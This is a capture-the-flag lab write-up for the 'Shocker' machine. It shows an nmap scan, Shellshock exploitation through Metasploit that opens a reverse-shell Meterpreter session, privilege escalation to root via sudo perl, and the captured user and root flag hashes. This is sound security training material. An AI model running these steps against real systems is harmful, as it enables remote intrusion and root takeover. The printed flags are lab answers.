# Nmap
nmap shows port 80 open
nmap -sC -sV -p-65535 --script vuln 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds
# Go to the WebApp:
greeted by:
## page source:
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
Finding and Exploiting Shellshock
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
The following is the output from scanning the target uri by using the seen below msf module: *http://10.10.10.56/cgi-bin/user.sh*
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Searching for suitable shellshock exploit:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec
By using the *show info* command I have found a suitable exploit for our case:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5
Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-09-24
Provided by:
Stephane Chazelas
wvu <[email protected]>
juan vazquez <[email protected]>
lcamtuf
Available targets:
Id Name
-- ----
0 Linux x86
1 Linux x86_64
*(removed some info)*
Payload information:
Space: 2048
Description:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition.
References:
https://cvedetails.com/cve/CVE-2014-6271/
https://cvedetails.com/cve/CVE-2014-6278/
https://cwe.mitre.org/data/definitions/94.html
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://access.redhat.com/articles/1200223
https://seclists.org/oss-sec/2014/q3/649
Also known as:
Shellshock
In the following lines, I am using the exploit, setting the requirements and exploiting it, resulting in a meterpreter session.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.4:1234
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400
In the following section I have:
* checked who am i logged as
* traversed to the home dir of that user and listed files, finding the user flag
* sudo -l to check the sudoers file for misconfiguration. We can privesc with perl.
meterpreter > shell
Process 1530 created.
Channel 1 created.
ls
user.sh
whoami
shelly
cd
ls
user.txt
cat user.txt
3b52250728977779d192b0262d2c2d7e
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl -e 'exec "/bin/bash"'
whoami
root
cd /root/
ls
root.txt
cat root.txt
f77dc0ce91af01ad16326409e1d05b68
0 Comments
Recommended Comments
Няма коментари